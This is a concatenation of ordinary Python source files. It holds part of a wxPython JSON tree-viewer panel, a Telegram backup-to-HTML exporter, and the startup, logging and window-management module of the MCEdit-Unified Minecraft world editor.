super().__init__(parent=parentFrame)
#
# Your constructor here
#
self.view_base_name = "JSON Viewer"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._allTabs= {
'URL':self.m_optionpanel_url,
'File':self.m_optionpanel_file,
'Jobs':self.m_optionpanel_jobs,
'RAW':self.m_optionpanel_raw,
}
self._currentInput= "URL"
self._jobCache = {}
self._currentJson = {}
#self.imageList = None
_icons = {
'json':parentFrame.RessourcesProvider.GetImage('json_tree_icon') ,
'dict': parentFrame.RessourcesProvider.GetImage('dict_tree_icon'),
'list': parentFrame.RessourcesProvider.GetImage('list_tree_icon'),
'str': parentFrame.RessourcesProvider.GetImage('str_tree_icon'),
'int': parentFrame.RessourcesProvider.GetImage('int_tree_icon'),
'bool': parentFrame.RessourcesProvider.GetImage('int_tree_icon'),
'float': parentFrame.RessourcesProvider.GetImage('int_tree_icon'),
'unknown': parentFrame.RessourcesProvider.GetImage('unknown_tree_icon'),
'class': parentFrame.RessourcesProvider.GetImage('class_tree_obj')
#console_view.png
}
self.wxTree = wxRavenTreeView(self.m_treeListCtrl1, _icons, _fillTreeCallback=None, _onChangeCallback=self.onChangeTest)
#This is to add the view in the appropriate place using the mainapp to do so
#
#The only exception is when the pannel itself is called by the plugin or another view
#In this case the position in main app must not be managed (see rpc command panel as example)
#
if not isInternalPluginView:
parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#self.LoadSearchOptions()
parentFrame.RessourcesProvider.ApplyThemeOnPanel(self)
self.defaultRoot = parentFrame.GetPath('ROOT')
#self.m_pythonSourceCodeExplorer.SetPath(self.defaultRoot)
#self.m_pythonSourceCodeExplorer.SetDefaultPath(self.defaultRoot)
#self.m_choice1.Bind(wx.EVT_CHOICE, self.OnInputSourceChanged)
#self.m_pythonSourceCodeExplorer.Bind(wx.EVT_DIRCTRL_FILEACTIVATED, self.OnFileClicked)
#
# If your app need to load a bunch of data, it may want to wait the app is ready
# specially at startup + resume of plugins
# Use this thread method + callback to manage the 1sec/2sec init delay
#
#
self.waitApplicationReady()
def OnClose(self, evt=None):
pass
def waitApplicationReady(self):
t=threading.Thread(target=self.__waitLoop_T__, args=(self.setupPanel,))
t.start()
def __waitLoop_T__(self,callback):
while not self.parent_frame._isReady:
time.sleep(2)
wx.CallAfter(callback, ())
def setupPanel(self, evt=None):
self.OnInputSourceChanged()
def __appendElement__(self, elem, parentTree, strType):
elem_str = strType
elem_type = str(type(elem).__name__)
elem_size = self.convert_size(sys.getsizeof(str(elem)))
_icon = self.wxTree.getImage('unknown')
_matchIcon = self.wxTree.getImage(type(elem).__name__)
if _matchIcon!=None:
_icon = _matchIcon
if _matchIcon == None and self.__isExplorableObject__(elem):
_icon = self.wxTree.getImage('class')
child = self.wxTree._tree.AppendItem(parentTree, elem_str)
self.wxTree._tree.SetItemText(child, 1, elem_type)
self.wxTree._tree.SetItemText(child, 2, elem_size)
self.wxTree._tree.SetItemImage(child, closed=_icon, opened=_icon)
return child
def __isExplorableObject__(self,objdata):
_res=True
#if not isinstance(objdata, dict) and not isinstance(objdata, list) :
# _res = False
if isinstance(objdata, int) :
_res = False
if isinstance(objdata, float) :
_res = False
if isinstance(objdata, complex) :
_res = False
if isinstance(objdata, str) :
_res = False
if isinstance(objdata, tuple) :
_res = False
if isinstance(objdata, int) :
_res = False
if isinstance(objdata, bool) :
_res = False
return _res
def __exploreObject__(self, objJson, parent=None):
if parent == None:
parent = self.root
#_icon = self.wxTree.getImage('unknown')
if isinstance(objJson, dict):
counter=0
for _subKey in objJson:
_subValue = objJson[_subKey]
#_icon = self.wxTree.getImage('dict')
if self.__isExplorableObject__(_subValue):
child = self.__appendElement__(_subValue, parent, f"{_subKey}")
self.__exploreObject__(_subValue, child)
else:
child = self.__appendElement__(_subValue, parent, f'{_subKey} : {str(_subValue)}')
counter = counter+1
elif isinstance(objJson, list):
counter=0
for _subValue in objJson:
#_icon = self.wxTree.getImage('list')
if self.__isExplorableObject__(_subValue):
child = self.__appendElement__(_subValue, parent, f"[{counter}]")
self.__exploreObject__(_subValue, child)
else:
child = self.__appendElement__(_subValue, parent, f'[{counter}] : {str(_subValue)}')
counter = counter+1
elif self.__isExplorableObject__(objJson):
try:
objJsonRetry = objJson.__json__()
self.__exploreObject__(objJsonRetry, parent)
except Exception as e:
child =self.__appendElement__(objJson, parent, f"{str(objJson)}")
'''
try:
objJsonRetry = objJson.__repr__()
self.__exploreObject__(objJsonRetry, parent)
except Exception as e:
pass
#__json__
'''
else:
child =self.__appendElement__(objJson, parent, f"{str(objJson)}")
def onChangeTest(self,evt):
toplabel = self.wxTree._currentText
def UpdateView(self, evt=None):
#self.root=None
self.wxTree._tree.DeleteAllItems()
#DeleteAllItems
w,h=self.wxTree._tree.GetSize()
czise = 0.8*w
self.wxTree._tree.SetColumnWidth(0, czise)
print(czise)
self.root = self.wxTree._tree.InsertItem(self.wxTree._tree.GetRootItem(), wx.dataview.TLI_FIRST, self._currentInput)
self.wxTree._tree.SetItemText(self.root, 1, str(type(self._currentJson)))
self.wxTree._tree.SetItemText(self.root, 2, self.convert_size(sys.getsizeof(str(self._currentJson))))
self.wxTree._tree.SetItemImage(self.root, closed=self.wxTree.getImage('json'), opened=self.wxTree.getImage('json'))
self.__exploreObject__(self._currentJson, None)
def convert_size(self,size_bytes):
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
def OnInputSourceChanged(self, evt=None):
_val= self.m_choice1.GetString(self.m_choice1.GetCurrentSelection())
for _k in self._allTabs:
if _k == _val:
self._allTabs[_k].Show()
else:
self._allTabs[_k].Hide()
self._currentInput= _val
self.Layout()
def OnRefreshJobList(self, evt):
self.__RefreshJobList__(evt)
def __RefreshJobList__(self, evt=None):
listofJobJson = {}
self.m_choice_job.Clear()
jlist=self.parent_frame.JobManager.GetJobs()
for _j in jlist:
_jnameStr = _j.getJobFriendlyName()
_jdatasJson = _j.ExportRemoteJobStatusJson(_withResult=True)
self.m_choice_job.Append(_jnameStr)
listofJobJson[_jnameStr]=_jdatasJson
self._jobCache = listofJobJson
#return listofJobJson
def OnJobSelected(self,evt=None):
_val= self.m_choice_job.GetString(self.m_choice_job.GetCurrentSelection())
jsondatas = self._jobCache[_val]
self._currentJson = jsondatas
self.UpdateView(None)
def OnFileChanged(self, evt=None, forceFile=''):
print('OnFileChanged')
self._lastFileName = str(self.m_filePicker1.GetPath())
if forceFile != '':
self._lastFileName = forceFile
self.__LoadTextFile__(self._lastFileName)
def __LoadTextFile__(self, file):
print('__LoadTextFile__')
_excp=False
#_excp = True
try:
with open(file, 'r') as f:
data = json.load(f)
self._currentJson = data
self.UpdateView(None)
except Exception as e:
_excp = True
#UserError(self.parent_frame, f"Invalid JSON File or Data : {e}")
if _excp:
try:
import ast
f = open(file, "r")
jsonData = ast.literal_eval(f.read())
self._currentJson = jsonData
self.UpdateView(None)
except Exception as e:
UserError(self.parent_frame, f"Invalid JSON File or Data : {e}")
def OnLoadURLClicked(self, evt):
print('OnLoadURLClicked')
_url = self.m_textCtrl3.GetValue()
self.__LoadUrl__(_url)
def __LoadUrl__(self, url):
try:
response = requests.get(url)
data = response.json()
self._currentJson = data
self.UpdateView(None)
#print(data)
except Exception as e:
UserError(self.parent_frame, f"Invalid JSON URL or Data : {e}")
def __LoadRaw__(self, strData):
print('__LoadTextFile__')
_excp=False
try:
data = json.loads(strData)
self._currentJson = data
self.UpdateView(None)
except Exception as e:
_excp = True
#UserError(self.parent_frame, f"Invalid JSON File or Data : {e}")
if _excp:
try:
jsonData = ast.literal_eval(strData)
self._currentJson = jsonData
self.UpdateView(None)
except Exception as e:
UserError(self.parent_frame, f"Invalid JSON File or Data : {e}")
def OnRawTextChanged(self,evt=None):
self.__LoadRaw__(self.m_textCtrl6.GetValue())
def OnPasteRawClicked(self, evt):
s = libs.pyperclip.paste()
self.m_textCtrl6.SetValue(s)
|
exporter.py | from datetime import date, timedelta, datetime
from os import path, makedirs
from shutil import copyfile
from threading import Thread
from os.path import isfile
from telethon.tl.types import MessageService
from exporter import HTMLTLWriter
from media_handler import MediaHandler
from tl_database import TLDatabase
class Exporter:
"""Class used to export database files"""
# Default output directory for all the exported backups
export_dir = 'backups/exported'
def __init__(self, backups_dir, name):
self.backups_dir = backups_dir
self.name = name
self.output_dir = path.join(Exporter.export_dir, name)
self.media_handler = MediaHandler(self.output_dir)
#region Exporting databases
def export(self, callback=None):
"""Exports the given database with the specified name.
An optional callback function can be given with one
dictionary parameter containing progress information
(saved_msgs, total_msgs, etl)"""
Thread(target=self.export_thread, kwargs={ 'callback': callback }).start()
def copy_default_media(self):
"""Copies the default media and style sheets to the output directory"""
makedirs(self.output_dir, exist_ok=True)
copyfile('exporter/resources/style.css', path.join(self.output_dir, 'style.css'))
self.media_handler.make_tree()
copyfile('exporter/resources/default_propic.png',
self.media_handler.get_default_file('propics'))
copyfile('exporter/resources/default_photo.png',
self.media_handler.get_default_file('photos'))
def export_thread(self, callback):
"""The exporting a conversation method (should be ran in a different thread)"""
with TLDatabase(self.backups_dir) as db:
db_media_handler = MediaHandler(self.backups_dir)
# First copy the default media files
self.copy_default_media()
progress = {
'exported': 0,
'total': db.count('messages'),
'etl': 'Unknown'
}
# The first date will obviously be the first day
# TODO This fails if there are 0 messages in the database, export should be disabled!
previous_date = self.get_message_date(db.query_message('order by id asc'))
# Also find the next day
following_date = self.get_previous_and_next_day(db, previous_date)[1]
# Set the first writer (which will have the "previous" date, the first one)
writer = HTMLTLWriter(previous_date, self.media_handler,
following_date=following_date)
# Keep track from when we started to determine the estimated time left
start = datetime.now()
# Export the profile photos, from users chats and channels
# TODO This should also have a progress if we have a backup of thousands of files!
for user in db.query_users():
if user.photo:
source = db_media_handler.get_propic_path(user)
output = self.media_handler.get_propic_path(user)
if isfile(source):
copyfile(source, output)
# Iterate over all the messages to export them in their respective days
for msg in db.query_messages('order by id asc'):
msg_date = self.get_message_date(msg)
progress['exported'] += 1
# As soon as we're in the next day, update the output the writer
if msg_date != previous_date:
# Exit the previous writer to end the header
writer.__exit__(None, None, None)
# Update date values and create a new instance
previous_date, following_date =\
self.get_previous_and_next_day(db, msg_date)
writer = HTMLTLWriter(msg_date, self.media_handler,
previous_date=previous_date,
following_date=following_date)
# Call the callback
if callback:
progress['etl'] = self.calculate_etl(start, progress['exported'], progress['total'])
callback(progress)
else:
print(progress)
writer.write_message(msg, db)
# If the message has media, we need to copy it so it's accessible by the exported HTML
if not isinstance(msg, MessageService) and msg.media:
source = db_media_handler.get_msg_media_path(msg)
output = self.media_handler.get_msg_media_path(msg)
# Source may be None if the media is unsupported (i.e. a webpage)
if source and isfile(source):
copyfile(source, output)
previous_date = msg_date
# Always exit at the end
writer.__exit__(None, None, None)
# Call the callback to notify we've finished
if callback:
progress['etl'] = timedelta(seconds=0)
callback(progress)
#endregion
#region Utilities
@staticmethod
def get_previous_and_next_day(db, message_date):
"""Gets the previous and following saved days given the day in between in the database"""
previous = db.query_message("where date < '{}' order by id desc"
.format(message_date))
following = db.query_message("where date >= '{}' order by id asc"
.format(message_date+timedelta(days=1)))
return Exporter.get_message_date(previous), Exporter.get_message_date(following)
@staticmethod
def calculate_etl(start, saved, total):
"""Calculates the estimated time left, based on how long it took us
to reach "saved" and how many messages we have left"""
delta_time = (datetime.now() - start).total_seconds() / saved
left = total - saved
return timedelta(seconds=round(left * delta_time, 1))
@staticmethod
def get_message_date(message):
"""Retrieves the given message DATE, ignoring the time (hour, minutes, seconds, etc.)"""
if message:
return date(year=message.date.year, month=message.date.month, day=message.date.day)
#endregion
|
mcedit.py | # !/usr/bin/env python2.7
# -*- coding: utf_8 -*-
# import resource_packs # not the right place, moving it a bit further
#-# Modified by D.C.-G. for translation purpose
#.# Marks the layout modifications. -- D.C.-G.
"""
mcedit.py
Startup, main menu, keyboard configuration, automatic updating.
"""
import splash
import OpenGL
import sys
import os
if "-debug" not in sys.argv:
OpenGL.ERROR_CHECKING = False
import logging
# Setup file and stderr logging.
logger = logging.getLogger()
# Set the log level up while importing OpenGL.GL to hide some obnoxious warnings about old array handlers
logger.setLevel(logging.WARN)
logger.setLevel(logging.DEBUG)
logfile = 'mcedit.log'
# if hasattr(sys, 'frozen'):
# if sys.platform == "win32":
# import esky
# app = esky.Esky(sys.executable)
# logfile = os.path.join(app.appdir, logfile)
#
if sys.platform == "darwin":
logfile = os.path.expanduser("~/Library/Logs/mcedit.log")
else:
logfile = os.path.join(os.getcwdu(), logfile)
fh = logging.FileHandler(logfile, mode="w")
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.WARN)
if "--log-info" in sys.argv:
ch.setLevel(logging.INFO)
if "--log-debug" in sys.argv:
ch.setLevel(logging.DEBUG)
class FileLineFormatter(logging.Formatter):
def format(self, record):
record.__dict__['fileline'] = "%(module)s.py:%(lineno)d" % record.__dict__
record.__dict__['nameline'] = "%(name)s.py:%(lineno)d" % record.__dict__
return super(FileLineFormatter, self).format(record)
fmt = FileLineFormatter(
'[%(levelname)8s][%(nameline)30s]:%(message)s'
)
fh.setFormatter(fmt)
ch.setFormatter(fmt)
logger.addHandler(fh)
logger.addHandler(ch)
import release
start_msg = 'Starting MCEdit-Unified v%s'%release.TAG
logger.info(start_msg)
print '[ ****** ] ~~~~~~~~~~ %s'%start_msg
from version_utils import PlayerCache
import directories
import keys
import albow
import locale
DEF_ENC = locale.getdefaultlocale()[1]
if DEF_ENC is None:
DEF_ENC = "UTF-8"
from albow.translate import _, getPlatInfo
from albow.openglwidgets import GLViewport
from albow.root import RootWidget
from config import config
albow.resource.resource_dir = directories.getDataDir()
import panels
import leveleditor
# Building translation template
if "-tt" in sys.argv:
sys.argv.remove('-tt')
# Overwrite the default marker to have one adapted to our specific needs.
albow.translate.buildTemplateMarker = """
### THE FOLLOWING LINES HAS BEEN ADDED BY THE TEMPLATE UPDATE FUNCTION.
### Please, consider to analyze them and remove the entries referring
### to ones containing string formatting.
###
### For example, if you have a line already defined with this text:
### My %{animal} has %d legs.
### you may find lines like these below:
### My parrot has 2 legs.
### My dog has 4 legs.
###
### You also may have unwanted partial strings, especially the ones
### used in hotkeys. Delete them too.
### And, remove this paragraph, or it will be displayed in the program...
"""
albow.translate.buildTemplate = True
albow.translate.loadTemplate()
# Save the language defined in config and set en_US as current one.
logging.warning('MCEdit is invoked to update the translation template.')
orglang = config.settings.langCode.get()
logging.warning('The actual language is %s.'%orglang)
logging.warning('Setting en_US as language for this session.')
config.settings.langCode.set('en_US')
import mceutils
import mcplatform
# The two next switches '--debug-wm' and '--no-wm' are used to debug/disable the internal window handler.
# They are exclusive. You can't debug if it is disabled.
if "--debug-wm" in sys.argv:
mcplatform.DEBUG_WM = True
if "--no-wm" in sys.argv:
mcplatform.DEBUG_WM = False
mcplatform.USE_WM = False
else:
mcplatform.setupWindowHandler()
DEBUG_WM = mcplatform.DEBUG_WM
USE_WM = mcplatform.USE_WM
#-# DEBUG
if mcplatform.hasXlibDisplay and DEBUG_WM:
print '*** Xlib version', str(mcplatform.Xlib.__version__).replace(' ', '').replace(',', '.')[1:-1], 'found in',
if os.path.expanduser('~/.local/lib/python2.7/site-packages') in mcplatform.Xlib.__file__:
print 'user\'s',
else:
print 'system\'s',
print 'libraries.'
#-#
from mcplatform import platform_open
import numpy
from pymclevel.minecraft_server import ServerJarStorage
import os
import os.path
import pygame
from pygame import display, rect
import pymclevel
# import release
import shutil
import sys
import traceback
import threading
from utilities.gl_display_context import GLDisplayContext
#&# Prototype fro blocks/items names
import mclangres
#&#
getPlatInfo(OpenGL=OpenGL, numpy=numpy, pygame=pygame)
ESCAPE = '\033'
class MCEdit(GLViewport):
def_enc = DEF_ENC
def __init__(self, displayContext, *args):
if DEBUG_WM:
print "############################ __INIT__ ###########################"
self.resizeAlert = config.settings.showWindowSizeWarning.get()
self.maximized = config.settings.windowMaximized.get()
self.saved_pos = config.settings.windowX.get(), config.settings.windowY.get()
if displayContext.win and DEBUG_WM:
print "* self.displayContext.win.state", displayContext.win.get_state()
print "* self.displayContext.win.position", displayContext.win.get_position()
self.dis = None
self.win = None
self.wParent = None
self.wGrandParent = None
self.linux = False
if sys.platform == 'linux2' and mcplatform.hasXlibDisplay:
self.linux = True
self.dis = dis = mcplatform.Xlib.display.Display()
self.win = win = dis.create_resource_object('window', display.get_wm_info()['window'])
curDesk = os.environ.get('XDG_CURRENT_DESKTOP')
if curDesk in ('GNOME', 'X-Cinnamon', 'Unity'):
self.geomReciever = self.maximizeHandler = wParent = win.query_tree().parent
self.geomSender = wGrandParent = wParent.query_tree().parent
elif curDesk == 'KDE':
self.maximizeHandler = win.query_tree().parent
wParent = win.query_tree().parent.query_tree().parent
wGrandParent = wParent.query_tree().parent.query_tree().parent
self.geomReciever = self.geomSender = win.query_tree().parent.query_tree().parent.query_tree().parent
else:
self.maximizeHandler = self.geomReciever = self.geomSender = wGrandParent = wParent = None
self.wParent = wParent
self.wGrandParent = wGrandParent
root = dis.screen().root
windowID = root.get_full_property(dis.intern_atom('_NET_ACTIVE_WINDOW'), mcplatform.Xlib.X.AnyPropertyType).value[0]
print "###\nwindowID", windowID
window = dis.create_resource_object('window', windowID)
print "###\nwindow.get_geometry()", window.get_geometry()
print "###\nself.win", self.win.get_geometry()
print "###\nself.wParent.get_geometry()", self.wParent.get_geometry()
print "###\nself.wGrandParent.get_geometry()", self.wGrandParent.get_geometry()
try:
print "###\nself.wGrandParent.query_tree().parent.get_geometry()", self.wGrandParent.query_tree().parent.get_geometry()
except:
pass
print "###\nself.maximizeHandler.get_geometry()", self.maximizeHandler.get_geometry()
print "###\nself.geomReciever.get_geometry()", self.geomReciever.get_geometry()
print "###\nself.geomSender.get_geometry()", self.geomSender.get_geometry()
print "###\nself.win", self.win
print "###\nself.wParent", self.wParent
print "###\nself.wGrandParent", self.wGrandParent
print "###\nself.maximizeHandler", self.maximizeHandler
print "###\nself.geomReciever", self.geomReciever
print "###\nself.geomSender", self.geomSender
ws = displayContext.getWindowSize()
r = rect.Rect(0, 0, ws[0], ws[1])
GLViewport.__init__(self, r)
if DEBUG_WM:
print "self.size", self.size, "ws", ws
if displayContext.win and self.maximized:
# Send a maximize event now
displayContext.win.set_state(mcplatform.MAXIMIZED)
# Flip pygame.display to avoid to see the splash un-centered.
pygame.display.flip()
self.displayContext = displayContext
self.bg_color = (0, 0, 0, 1)
self.anchor = 'tlbr'
if not config.config.has_section("Recent Worlds"):
config.config.add_section("Recent Worlds")
self.setRecentWorlds([""] * 5)
self.optionsPanel = panels.OptionsPanel(self)
if not albow.translate.buildTemplate:
self.optionsPanel.getLanguageChoices()
lng = config.settings.langCode.get()
if lng not in self.optionsPanel.sgnal:
lng = "en_US"
config.settings.langCode.set(lng)
albow.translate.setLang(lng)
# Set the window caption here again, since the initialization is done through several steps...
display.set_caption(('MCEdit ~ ' + release.get_version()%_("for")).encode('utf-8'), 'MCEdit')
self.optionsPanel.initComponents()
self.graphicsPanel = panels.GraphicsPanel(self)
#&# Prototype for blocks/items names
mclangres.buildResources(lang=albow.translate.getLang())
#&#
#.#
self.keyConfigPanel = keys.KeyConfigPanel(self)
#.#
self.droppedLevel = None
self.nbtCopyBuffer = None
self.reloadEditor()
"""
check command line for files dropped from explorer
"""
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
f = arg.decode(sys.getfilesystemencoding())
if os.path.isdir(os.path.join(pymclevel.minecraftSaveFileDir, f)):
f = os.path.join(pymclevel.minecraftSaveFileDir, f)
self.droppedLevel = f
break
if os.path.exists(f):
self.droppedLevel = f
break
self.fileOpener = albow.FileOpener(self)
self.add(self.fileOpener)
self.fileOpener.focus()
#-# Translation live updtate preparation
def set_update_ui(self, v):
GLViewport.set_update_ui(self, v)
if v:
#&# Prototype for blocks/items names
mclangres.buildResources(lang=albow.translate.getLang())
#&#
self.keyConfigPanel = keys.KeyConfigPanel(self)
self.graphicsPanel = panels.GraphicsPanel(self)
if self.fileOpener in self.subwidgets:
idx = self.subwidgets.index(self.fileOpener)
self.remove(self.fileOpener)
self.fileOpener = albow.FileOpener(self)
if idx is not None:
self.add(self.fileOpener)
self.fileOpener.focus()
#-#
editor = None
def reloadEditor(self):
reload(leveleditor)
level = None
pos = None
if self.editor:
level = self.editor.level
self.remove(self.editor)
c = self.editor.mainViewport
pos, yaw, pitch = c.position, c.yaw, c.pitch
self.editor = leveleditor.LevelEditor(self)
self.editor.anchor = 'tlbr'
if level:
self.add(self.editor)
self.editor.gotoLevel(level)
self.focus_switch = self.editor
if pos is not None:
c = self.editor.mainViewport
c.position, c.yaw, c.pitch = pos, yaw, pitch
def add_right(self, widget):
w, h = self.size
widget.centery = h // 2
widget.right = w
self.add(widget)
def showOptions(self):
self.optionsPanel.present()
def showGraphicOptions(self):
self.graphicsPanel.present()
def showKeyConfig(self):
self.keyConfigPanel.presentControls()
def loadRecentWorldNumber(self, i):
worlds = list(self.recentWorlds())
if i - 1 < len(worlds):
self.loadFile(worlds[i - 1])
numRecentWorlds = 5
@staticmethod
def removeLevelDat(filename):
if filename.endswith("level.dat"):
filename = os.path.dirname(filename)
return filename
def recentWorlds(self):
worlds = []
for i in range(self.numRecentWorlds):
if config.config.has_option("Recent Worlds", str(i)):
try:
filename = (config.config.get("Recent Worlds", str(i)).decode('utf-8'))
worlds.append(self.removeLevelDat(filename))
except Exception, e:
logging.error(repr(e))
return list((f for f in worlds if f and os.path.exists(f)))
def addRecentWorld(self, filename):
filename = self.removeLevelDat(filename)
rw = list(self.recentWorlds())
if filename in rw:
return
rw = [filename] + rw[:self.numRecentWorlds - 1]
self.setRecentWorlds(rw)
@staticmethod
def setRecentWorlds(worlds):
for i, filename in enumerate(worlds):
config.config.set("Recent Worlds", str(i), filename.encode('utf-8'))
def makeSideColumn1(self):
def showLicense():
platform_open(os.path.join(directories.getDataDir(), "LICENSE.txt"))
def refresh():
PlayerCache().force_refresh()
hotkeys = ([("",
"Controls",
self.showKeyConfig),
("",
"Graphics",
self.showGraphicOptions),
("",
"Options",
self.showOptions),
("",
"Homepage",
lambda: platform_open("http://www.mcedit-unified.net"),
"http://www.mcedit-unified.net"),
("",
"About MCEdit",
lambda: platform_open("http://www.mcedit-unified.net/about.html"),
"http://www.mcedit-unified.net/about.html"),
("",
"License",
showLicense,
os.path.join(directories.getDataDir(), "LICENSE.txt")),
("",
"Refresh Player Names",
refresh)
])
c = albow.HotkeyColumn(hotkeys)
return c
def makeSideColumn2(self):
def showCacheDir():
try:
os.mkdir(directories.getCacheDir())
except OSError:
pass
platform_open(directories.getCacheDir())
def showScreenshotsDir():
try:
os.mkdir(os.path.join(directories.getCacheDir(), "screenshots"))
except OSError:
pass
platform_open(os.path.join(directories.getCacheDir(), "screenshots"))
hotkeys = ([("",
"Config Files",
showCacheDir,
directories.getCacheDir()),
("",
"Screenshots",
showScreenshotsDir,
os.path.join(directories.getCacheDir(), "screenshots"))
])
c = albow.HotkeyColumn(hotkeys)
return c
def resized(self, dw, dh):
"""
Handle window resizing events.
"""
if DEBUG_WM:
print "############################ RESIZED ############################"
(w, h) = self.size
config_w, config_h = config.settings.windowWidth.get(), config.settings.windowHeight.get()
win = self.displayContext.win
if DEBUG_WM and win:
print "dw", dw, "dh", dh
print "self.size (w, h) 1", self.size, "win.get_size", win.get_size()
print "size 1", config_w, config_h
elif DEBUG_WM and not win:
print "win is None, unable to print debug messages"
if win:
x, y = win.get_position()
if DEBUG_WM:
print "position", x, y
print "config pos", (config.settings.windowX.get(), config.settings.windowY.get())
if w == 0 and h == 0:
# The window has been minimized, no need to draw anything.
self.editor.renderer.render = False
return
# Mac window handling works better now, but `win`
# doesn't exist. So to get this alert to show up
# I'm checking if the platform is darwin. This only
# works because the code block never actually references
# `win`, otherwise it WOULD CRASH!!!
# You cannot change further if statements like this
# because they reference `win`
if win or sys.platform == "darwin":
# Handling too small resolutions.
# Dialog texts.
# "MCEdit does not support window resolutions below 1000x700.\nYou may not be able to access all functions at this resolution."
# New buttons:
# "Don't warn me again": disable the window popup across sessions.
# Tooltip: "Disable this message. Definitively. Even the next time you start MCEdit."
# "OK": dismiss the window and let go, don't pop up again for the session
# Tooltip: "Continue and not see this message until you restart MCEdit"
# "Cancel": resizes the window to the minimum size
# Tooltip: "Resize the window to the minimum recommended resolution."
# If the config showWindowSizeWarning is true and self.resizeAlert is true, show the popup
if (w < 1000 or h < 680) and config.settings.showWindowSizeWarning.get():
_w = w
_h = h
if self.resizeAlert:
answer = "_OK"
# Force the size only for the dimension that needs it.
if w < 1000 and h < 680:
_w = 1000
_h = 680
elif w < 1000:
_w = 1000
elif h < 680:
_h = 680
if not albow.dialogs.ask_tied_to:
answer = albow.ask(
"MCEdit does not support window resolutions below 1000x700.\nYou may not be able to access all functions at this resolution.",
["Don't remind me again.", "OK", "Cancel"], default=1, cancel=1,
responses_tooltips = {"Don't remind me again.": "Disable this message. Definitively. Even the next time you start MCEdit.",
"OK": "Continue and not see this message until you restart MCEdit",
"Cancel": "Resize the window to the minimum recommended resolution."},
tie_widget_to=True)
else:
if not albow.dialogs.ask_tied_to._visible:
albow.dialogs.ask_tied_to._visible = True
answer = albow.dialogs.ask_tied_to.present()
if answer == "Don't remind me again.":
config.settings.showWindowSizeWarning = False
self.resizeAlert = False
elif answer == "OK":
w, h = self.size
self.resizeAlert = False
elif answer == "Cancel":
w, h = _w, _h
else:
if albow.dialogs.ask_tied_to:
albow.dialogs.ask_tied_to.dismiss("_OK")
del albow.dialogs.ask_tied_to
albow.dialogs.ask_tied_to = None
elif (w >= 1000 or h >= 680):
if albow.dialogs.ask_tied_tos:
for ask_tied_to in albow.dialogs.ask_tied_tos:
ask_tied_to._visible = False
ask_tied_to.dismiss("_OK")
ask_tied_to.set_parent(None)
del ask_tied_to
if not win:
if w < 1000:
config.settings.windowWidth.set(1000)
w = 1000
x = config.settings.windowX.get()
if h < 680:
config.settings.windowHeight.set(680)
h = 680
y = config.settings.windowY.get()
if not self.editor.renderer.render:
self.editor.renderer.render = True
save_geom = True
if win:
maximized = win.get_state() == mcplatform.MAXIMIZED
sz = map(max, win.get_size(), (w, h))
if DEBUG_WM:
print "sz", sz
print "maximized", maximized, "self.maximized", self.maximized
if maximized:
if DEBUG_WM:
print "maximize, saving maximized size"
config.settings.windowMaximizedWidth.set(sz[0])
config.settings.windowMaximizedHeight.set(sz[1])
config.save()
self.saved_pos = config.settings.windowX.get(), config.settings.windowY.get()
save_geom = False
self.resizing = 0
win.set_mode(sz, self.displayContext.displayMode())
else:
if DEBUG_WM:
print "size 2", config.settings.windowWidth.get(), config.settings.windowHeight.get()
print "config_w", config_w, "config_h", config_h
print "pos", config.settings.windowX.get(), config.settings.windowY.get()
if self.maximized != maximized:
if DEBUG_WM:
print "restoring window pos and size"
print "(config.settings.windowX.get(), config.settings.windowY.get())", (config.settings.windowX.get(), config.settings.windowY.get())
(w, h) = (config_w, config_h)
win.set_state(1, (w, h), self.saved_pos)
else:
if DEBUG_WM:
print "window resized"
print "setting size to", (w, h), "and pos to", (x,y)
win.set_mode((w, h), self.displayContext.displayMode())
win.set_position((x, y))
config.settings.windowMaximizedWidth.set(0)
config.settings.windowMaximizedHeight.set(0)
config.save()
self.maximized = maximized
if DEBUG_WM:
print "self.size (w, h) 2", self.size, (w, h)
surf = pygame.display.get_surface()
print "display surf rect", surf.get_rect()
if win:
if hasattr(win.base_handler, 'get_geometry'):
print "win.base_handler geometry", win.base_handler.get_geometry()
print "win.base_handler.parent geometry", win.base_handler.query_tree().parent.get_geometry()
print "win.base_handler.parent.parent geometry", win.base_handler.query_tree().parent.query_tree().parent.get_geometry()
if save_geom:
config.settings.windowWidth.set(w)
config.settings.windowHeight.set(h)
config.save()
# The alert window is disabled if win is not None
if not win and (dw > 20 or dh > 20):
if not hasattr(self, 'resizeAlert'):
self.resizeAlert = self.shouldResizeAlert
if self.resizeAlert:
albow.alert(
"Window size increased. You may have problems using the cursor until MCEdit is restarted.")
self.resizeAlert = False
if win:
win.sync()
GLViewport.resized(self, dw, dh)
shouldResizeAlert = config.settings.shouldResizeAlert.property()
def loadFile(self, filename, addToRecent=True):
if os.path.exists(filename):
try:
self.editor.loadFile(filename, addToRecent=addToRecent)
except Exception, e:
logging.error(u'Failed to load file {0}: {1!r}'.format(
filename, e))
return None
self.remove(self.fileOpener)
self.fileOpener = None
if self.editor.level:
self.editor.size = self.size
self.add(self.editor)
self.focus_switch = self.editor
def createNewWorld(self):
level = self.editor.createNewLevel()
if level:
self.remove(self.fileOpener)
self.editor.size = self.size
self.add(self.editor)
self.focus_switch = self.editor
albow.alert(
"World created. To expand this infinite world, explore the world in Minecraft or use the Chunk Control tool to add or delete chunks.")
def removeEditor(self):
self.remove(self.editor)
self.fileOpener = albow.FileOpener(self)
self.add(self.fileOpener)
self.focus_switch = self.fileOpener
def confirm_quit(self):
#-# saving language template
if hasattr(albow.translate, "saveTemplate"):
albow.translate.saveTemplate()
#-#
self.saveWindowPosition()
config.save()
if self.editor.unsavedEdits:
# if config.settings.savePositionOnClose.get():
# self.editor.waypointManager.saveLastPosition(self.editor.mainViewport, self.editor.level.getPlayerDimension())
# self.editor.waypointManager.save()
result = albow.ask(_("There are {0} unsaved changes.").format(self.editor.unsavedEdits),
responses=["Save and Quit", "Quit", "Cancel"])
if result == "Save and Quit":
self.saveAndQuit()
elif result == "Quit":
self.justQuit()
elif result == "Cancel":
return False
else:
raise SystemExit
def saveAndQuit(self):
self.editor.saveFile()
raise SystemExit
@staticmethod
def justQuit():
raise SystemExit
